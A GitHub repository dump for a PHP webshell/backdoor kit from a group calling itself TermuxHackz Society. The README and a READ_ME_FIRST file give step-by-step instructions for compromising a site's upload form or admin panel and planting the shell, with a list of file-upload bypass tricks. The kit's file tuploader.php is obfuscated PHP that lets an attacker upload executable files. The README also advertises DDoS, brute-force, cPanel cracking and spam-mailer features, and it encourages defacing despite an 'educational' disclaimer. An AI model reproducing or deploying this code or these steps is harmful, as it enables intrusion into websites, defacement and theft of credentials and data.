├── LICENSE
├── README.md
├── TermuxHackz-WebShell
├── Payload_image.png
├── READ_ME_FIRST!!.txt
├── config
├── ths1335.pHp
└── tuploader.php
├── donations.jpeg
├── images
├── qrcode
└── received_1065724630950464.jpeg
├── ths1.png
├── ths2.png
└── ths3.png
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2022 AnonyminHack5
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Php-Webshell/Backdoor
2 |
3 | A PHP webshell created by us TermuxHackz Society. For educational and/or testing purposes only.
4 | Can also be used for ctf challenges, which has uploader and main shell. (ths1335.php)
5 |
6 | # Note
7 | #### [+] Always investigate malware in a secure environment. This means: separately from your network and in a virtual machine!
8 | #### [+] Some backdoors may be backdoored (yes, really). Don't ever use this for any malicious purposes.
9 | #### [+] The backdoors follow the format: Backdoorname_SHA1.php, granted the name of the backdoor is known
10 | #### [+] The folder TermuxHackz Webshell contains the webshell (uploader and main shell[ths1335 shell]).
11 | #### [+] Dont just be a defacer alone!, do cool shits with the webshell. But can also be used for defacing
12 |
13 | # Created by
14 | TermuxHackz Society Team Members - AnonyminHack5
15 |
16 | Ths1335.php is a powerful webshell which has several and multiple features which are useful for spammers, defacers and also
17 | useful for those who loves to try cool shits too haha ^_^. It contains, Fake Mailer, Whois scan, iplookup, Cracking Cpanel, Whm, Admin Panel Finder and so much more. This help bypass site security and not like other shells.
18 |
19 | # Steps to use this webshell
20 | ```
21 | 1) Hack the site admin panel or look for site with upload option (for uploading pics, images, etc)
22 | 2) Look for upload section
23 | 3) First try to upload the Tuploader.php into the site
24 | If the site restricts php files, and says only png, jpeg or jpg images allowed
25 | Then next step is for you to upload the payload-image.png or try some file upload bypass like tuploader.pHp, tuploader.phtml etc
26 |
27 |
28 | The payload-image.png is an injected code for the php file
29 | So once the png image has been successfully uploaded
30 | But if the payload-image doesnt work. Use some file upload bypass tricks
31 |
32 | 4) Copy the image/shell location
33 | 5) Open in a tab
34 | 6) Then once you see the uploader
35 | 7) Upload the main shell which is the ths1335.php
36 | 8) Then you can use the shell..
37 |
38 | Hahah, make sure you use with care!!
39 | ```
40 | # File Upload Bypass
41 |
File Upload General Methodology
42 | Other useful extensions:
43 | PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
44 | ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
45 | Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
46 | Coldfusion: .cfm, .cfml, .cfc, .dbm
47 | Flash: .swf
48 | Perl: .pl, .cgi
49 | Erlang Yaws Web Server: .yaws
50 |
51 | Bypass file extensions checks
52 | 1) If they apply, the check the previous extensions. Also test them using some uppercase letters: pHp, .pHP5, .PhAr ..
53 | 2) Check adding a valid extension before the execution extension (use previous extensions also):
54 |
55 | file.png.php
56 | file.png.Php5
57 |
58 |
59 | 3) Try adding special characters at the end. You could use Burp to bruteforce all the ascii and Unicode characters. (Note that you can also try to use the previously motioned extensions)
60 |
61 |
62 | file.php%20
63 | file.php%0a
64 | file.php%00
65 | file.php%0d%0a
66 | file.php/
67 | file.php.\
68 | file.
69 | file.php....
70 | file.pHp5...
71 |
72 |
73 | 4) Try to bypass the protections tricking the extension parser of the server-side with techniques like doubling the extension or adding junk data (null bytes) between extensions. You can also use the previous extensions to prepare a better payload.
74 |
75 |
76 | file.png.php
77 | file.png.pHp5
78 | file.php%00.png
79 | file.php\x00.png
80 | file.php%0a.png
81 | file.php%0d%0a.png
82 | flile.phpJunk123png
83 |
84 |
85 | 5) Add another layer of extensions to the previous check:
86 |
87 | file.png.jpg.php
88 | file.php%00.png%00.jpg
89 |
90 |
91 | 6) Try to put the exec extension before the valid extension and pray so the server is misconfigured. **(useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php** will execute code):
92 |
93 | ex: file.php.png
94 |
95 |
96 | 7) Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. “file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The “::$data” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. “file.asp::$data.”)
97 | 8) Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php
98 |
99 | ```
100 | # Linux maximum 255 bytes
101 | /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
102 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png
103 | # Upload the file and check response how many characters it alllows. Let's say 236
104 | python -c 'print "A" * 232'
105 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
106 | # Make the payload
107 | AAA<--SNIP 232 A-->AAA.php.png
108 | ```
109 |
110 | Bypass Content-Type & magic number
111 | 1) Bypass Content-Type checks by setting the value of the Content-Type header to: image/png , text/plain , application/octet-stream
112 |
113 | >> Content-Type wordlist: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt
114 |
115 | 2) Bypass magic number check by adding at the beginning of the file the bytes of a real image (confuse the file command). Or introduce the shell inside the metadata: exiftool -Comment="
116 |
117 |
118 | Or you can try other tricks you know that might work. Haha
119 |
120 | # Some features of ths1335 Shell
121 | 1) File Manager
122 | 2) Dumping SQL database
123 | 3) Find admin panel page
124 | 4) Execute ssh commands on remote server
125 | 5) TCP and UDP flood ddos
126 | 6) CGI Shell
127 | 7) Ftp brute force
128 | 8) Cracking Cpanels and Whmpanels
129 | 9) Crack WordPress sites and change all usernames and password
130 | 10) Code Injector
131 | 11) And so much fuckin more hahahaha
132 |
133 |
134 | # Ths1335 Shell Images
135 | 
136 |
137 | 
138 |
139 | 
140 |
141 | # License
142 | ths1335.php shell is under the MIT license. This webshell is free for all use and for home and educational usages as well. Thanks to our team of skilled programmers hahaha.
143 |
144 | Incase you dont like to clone from github, haha, you can download the TermuxHackz Webshell zip from mediafire.
145 | Download here:- Download TermuxHackz WebShell here.
146 |
147 | Kindly star or fork this repo, to support us for this wonderful project
148 |
149 | # Donate
150 | 
151 | Donate to us if you love and appreciate the project. Donate here. Thanks for donations....
152 |
153 |
154 | # Version
155 | ```
156 | Version 1.0
157 | ```
158 |
159 | # Join our groups
160 | Join our Telegram group: here
161 | Visit our Site
162 | Join our facebook group: here
163 | Join our telegram Channel also by scanning the qr code below
164 |
165 | 
166 |
167 | # Notice Bugs?
168 | If you use our webshell and you notice bugs in em feel free to email me those bugs and We will try fix them.
169 | Report those bugs to me here.
170 |
171 | Thanks alot for the support
172 |
173 | # Faqs
174 | ##### 1) Some features doesn't work?
175 | If you notice that some features of the shell doesnt work, Try using a linux system with a good internet connection 📶 and try again. It should work. Using a windows system with this powerful webshell is limited. Thanks :)
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
--------------------------------------------------------------------------------
/TermuxHackz-WebShell/Payload_image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/TermuxHackz-WebShell/Payload_image.png
--------------------------------------------------------------------------------
/TermuxHackz-WebShell/READ_ME_FIRST!!.txt:
--------------------------------------------------------------------------------
1 | This webshell was created by TermuxHackz Society Team Members
2 |
3 | Steps to use this shell
4 |
5 | 1) Hack the site admin panel or look for site with upload option (for uploading pics, images, etc)
6 | 2) Look for upload section
7 | 3) First try to upload the Tuploader.php into the site
8 | If the site restricts php files, and says only png, jpeg or jpg images allowed
9 | Then next step is for you to upload the payload-image.png or try some file upload bypass like tuploader.pHp, tuploader.phtml etc
10 |
11 |
12 | The payload-image.png is an injected code for the php file
13 | So once the png image has been successfully uploaded
14 | But if the payload-image doesnt work. Use some file upload bypass tricks
15 |
16 | 4) Copy the image/shell location
17 | 5) Open in a tab
18 | 6) Then once you see the uploader
19 | 7) Upload the main shell which is the ths1335.php
20 | 8) Then you can use the shell..
21 |
22 | Hahah, make sure you use with care!!
23 |
24 | /////
25 | Created by TermuxHackz Society Team Members...
26 | /////
27 | Fuck the system
28 | Breaking web firewalls!!!
--------------------------------------------------------------------------------
/TermuxHackz-WebShell/config:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/TermuxHackz-WebShell/tuploader.php:
--------------------------------------------------------------------------------
1 | ".base64_decode("
<?php ${"\x47L\x4fB\x41\x4c\x53"}["y\x62\x72\x68o\x65a\x63\x67\x7ay\x6du\x5fs\x62\x6dx\x78\x6bo\x78\x5f\x70\x62w\x73m\x73t\x5fd\x67\x73v"]="_\x53E\x52V\x45R";${"\x47\x4cO\x42A\x4cS"}["p\x76\x5f\x61k\x76e\x68a\x64x\x62\x61\x69\x6fx\x66\x7ar\x5f\x70_\x79u\x74m\x67\x72n\x78p\x63"]="\x5fF\x49\x4cE\x53";${"\x47L\x4fB\x41L\x53"}["\x65\x6d\x7ax\x65\x6en\x6fx\x67o\x68n\x5fb\x76\x68d\x68\x6d_\x61f\x64"]="\x6ee\x77n\x61m\x65";${"\x47L\x4f\x42\x41L\x53"}["\x71p\x73d\x67g\x72b\x6av\x6dr\x64e\x65k\x76h\x78\x76p\x5f\x6bq\x7at\x62"]="\x65r\x72o\x72\x73";${"G\x4cO\x42A\x4c\x53"}["\x63m\x72v\x5fi\x75\x6d\x76w\x68\x6a\x79u\x78w\x77n\x6d\x67\x64s\x73\x6fh\x77x"]="\x66i\x6c\x65_\x65x\x74";${"\x47\x4c\x4f\x42A\x4c\x53"}["w\x74\x7a\x6eh\x67\x72d\x67\x70r\x6ak\x66c\x6af\x74i\x6b_\x77\x6ca\x77"]="\x65x\x74e\x6e\x73i\x6f\x6es";?><?php   ?><!DOCTYPE html><meta name="viewport" content="width=device-width initial-scale=1"><meta charset="utf-8"><head><title>---[<<-T-Uploader-->>]----</title></head><style>.left {	text-align: left;	color: white;	font-size: 16px;
}</style><html><body><style>* {
padding: 0;
margin: 0;
font-family: Tahoma, Verdana, sans-serif;
}
body {
color: lightgreen;
font-family: Tahoma, Verdana, sans-serif;
}
.container {
display: block;
}
.text1 {
color: orange;
font-size: 60px;
font-weight: 900;
font-family: serif;
text-align: center;
letter-spacing: 6px;
animation: effect 2s linear infinite;
cursor: pointer;
}
@keyframes effect {	0% {	color: orange;	-webkit-background-clip: text;	}	20% {	color: lightgreen;	font-weight: bold;	}	50% {	color: #3ce7d7;	-webkit-background-clip: text;	}	60% {	color: blue;	-webkit-background-clip: text;	}	70% {	color: cyan;	}	100% {	color: linear-gradient(#3ce7d7, #000fff);	-webkit-background-clip: text;	}
}
a {	color: lightblue;	text-decoration: none;
}</style><br><br><style>body {
background: #333;
font-family: "Lucida Console", "Courier New", monospace;
font-size: 16px;
text-align: center;
color: lightgreen;
}
.button-3 { appearance: none; background-color: #2ea44f; border: 1px solid rgba(27, 31, 35, .15); border-radius: 6px; box-shadow: rgba(27, 31, 35, .1) 0 1px 0; box-sizing: border-box; color: #fff; cursor: pointer; display: inline-block; font-family: -apple-system,system-ui,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji"; font-size: 14px; font-weight: 600; line-height: 20px; padding: 6px 16px; position: relative; text-align: center; text-decoration: none; user-select: none; -webkit-user-select: none; touch-action: manipulation; vertical-align: middle; white-space: nowrap;
}
.button-3:focus:not(:focus-visible):not(.focus-visible) { box-shadow: none; outline: none;
}
.button-3:hover { background-color: #2c974b;
}
.button-3:focus { box-shadow: rgba(46, 164, 79, .4) 0 0 0 3px; outline: none;
}
.button-3:disabled { background-color: #94d3a2; border-color: rgba(27, 31, 35, .1); color: rgba(255, 255, 255, .8); cursor: default;
}
.button-3:active { background-color: #298e46; box-shadow: rgba(20, 70, 32, .2) 0 1px 0 inset;
}</style><?php  error_reporting(0);ini_set('display_errors',0) ?><h3 class="text1">T-UPLOADER</h3><span class="text2">Created by TermuxHackz Society</span><form action="<?php echo ${${"G\x4c\x4f\x42A\x4c\x53"}["y\x62\x72\x68o\x65a\x63\x67\x7ay\x6du\x5fs\x62\x6dx\x78\x6bo\x78\x5f\x70\x62w\x73m\x73t\x5fd\x67\x73v"]}['PHP_SELF'] ?>" method="POST" enctype="multipart/form-data"><label class="col-md-3 control-label">Upload file</label><input type="file" name="attachment" class="form-control-file" /><button type="submit" role="button" class="button-3">Upload</button></form><br/><br/><br><br><?php if(is_uploaded_file(${${"G\x4cO\x42A\x4cS"}["p\x76\x5f\x61k\x76e\x68a\x64x\x62\x61\x69\x6fx\x66\x7ar\x5f\x70_\x79u\x74m\x67\x72n\x78p\x63"]}['attachment']['tmp_name'])){${${"\x47L\x4fB\x41L\x53"}["\x65\x6d\x7ax\x65\x6en\x6fx\x67o\x68n\x5fb\x76\x68d\x68\x6d_\x61f\x64"]}=dirname(__FILE__)."\x2f".basename(${${"G\x4c\x4fB\x41L\x53"}["p\x76\x5f\x61k\x76e\x68a\x64x\x62\x61\x69\x6fx\x66\x7ar\x5f\x70_\x79u\x74m\x67\x72n\x78p\x63"]}['attachment']['name']);if(${${"G\x4c\x4fB\x41L\x53"}["p\x76\x5f\x61k\x76e\x68a\x64x\x62\x61\x69\x6fx\x66\x7ar\x5f\x70_\x79u\x74m\x67\x72n\x78p\x63"]}['attachment']['size']>1073741824){${${"G\x4cO\x42A\x4cS"}["\x71p\x73d\x67g\x72b\x6av\x6dr\x64e\x65k\x76h\x78\x76p\x5f\x6bq\x7at\x62"]}[]="\x46\x69\x6ce\x20s\x69\x7a\x65 \x6d\x75\x73t\x20b\x65\x20e\x78\x61\x63t\x6c\x79\x201\x47\x42";}${${"\x47L\x4fB\x41\x4c\x53"}["\x63m\x72v\x5fi\x75\x6d\x76w\x68\x6a\x79u\x78w\x77n\x6d\x67\x64s\x73\x6fh\x77x"]}=strtolower(end(explode('.',${${"\x47\x4cO\x42A\x4cS"}["p\x76\x5f\x61k\x76e\x68a\x64x\x62\x61\x69\x6fx\x66\x7ar\x5f\x70_\x79u\x74m\x67\x72n\x78p\x63"]}['attachment']['name'])));${${"G\x4c\x4f\x42A\x4cS"}["w\x74\x7a\x6eh\x67\x72d\x67\x70r\x6ak\x66c\x6af\x74i\x6b_\x77\x6ca\x77"]}=array("pdf","doc","jpg","png","txt","php","mp4","mp3","asp","docx","html","mhtml","zip","rar");if(in_array(${${"G\x4cO\x42A\x4c\x53"}["\x63m\x72v\x5fi\x75\x6d\x76w\x68\x6a\x79u\x78w\x77n\x6d\x67\x64s\x73\x6fh\x77x"]},${${"G\x4cO\x42\x41\x4cS"}["w\x74\x7a\x6eh\x67\x72d\x67\x70r\x6ak\x66c\x6af\x74i\x6b_\x77\x6ca\x77"]})===false){${${"\x47\x4cO\x42A\x4cS"}["\x71p\x73d\x67g\x72b\x6av\x6dr\x64e\x65k\x76h\x78\x76p\x5f\x6bq\x7at\x62"]}[]="F\x69l\x65\x20e\x78t\x65\x6es\x69\x6f\x6e \x6e\x6ft\x20a\x6cl\x6f\x77e\x64,\x20p\x6ce\x61\x73e\x20c\x68o\x6f\x73e\x20\x61 \x50D\x46,\x20D\x4fC\x2c\x20D\x4fC\x58,\x20J\x50\x47\x2c\x20P\x4eG\x2c \x54\x58T\x20\x66\x69l\x65.";}if(empty(${${"\x47L\x4fB\x41\x4c\x53"}["\x71p\x73d\x67g\x72b\x6av\x6dr\x64e\x65k\x76h\x78\x76p\x5f\x6bq\x7at\x62"]})==true){if(!(move_uploaded_file(${${"\x47L\x4f\x42A\x4c\x53"}["p\x76\x5f\x61k\x76e\x68a\x64x\x62\x61\x69\x6fx\x66\x7ar\x5f\x70_\x79u\x74m\x67\x72n\x78p\x63"]}['attachment']['tmp_name'],${${"\x47L\x4fB\x41L\x53"}["\x65\x6d\x7ax\x65\x6en\x6fx\x67o\x68n\x5fb\x76\x68d\x68\x6d_\x61f\x64"]}))){echo "<\x70\x3e\x45\x52R\x4fR\x3a \x20A\x20p\x72o\x62l\x65m\x20\x6f\x63c\x75\x72r\x65d\x20\x64u\x72\x69n\x67 \x66\x69\x6c\x65\x20u\x70\x6c\x6f\x61d\x21<\x2f\x70>\n";}else{echo "<\x62\x72\x3e";echo "\x3c\x70\x3e\x54\x68\x65\x20\x66\x69\x6c\x65\x20\x68\x61\x73\x20\x62\x65\x65\x6e\x20\x75\x70\x6c\x6f\x61\x64\x65\x64\x20\x74\x6f\x3a\x20{${${"\x47L\x4f\x42\x41L\x53"}["\x65\x6d\x7ax\x65\x6en\x6fx\x67o\x68n\x5fb\x76\x68d\x68\x6d_\x61f\x64"]}}\x3c\x2f\x70\x3e\n";}}else{print_r(${${"\x47L\x4fB\x41L\x53"}["\x71p\x73d\x67g\x72b\x6av\x6dr\x64e\x65k\x76h\x78\x76p\x5f\x6bq\x7at\x62"]});}} ?></body></html>
")); ?>
--------------------------------------------------------------------------------
/donations.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/donations.jpeg
--------------------------------------------------------------------------------
/images/qrcode:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/images/received_1065724630950464.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/images/received_1065724630950464.jpeg
--------------------------------------------------------------------------------
/ths1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/ths1.png
--------------------------------------------------------------------------------
/ths2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/ths2.png
--------------------------------------------------------------------------------
/ths3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/ths3.png
--------------------------------------------------------------------------------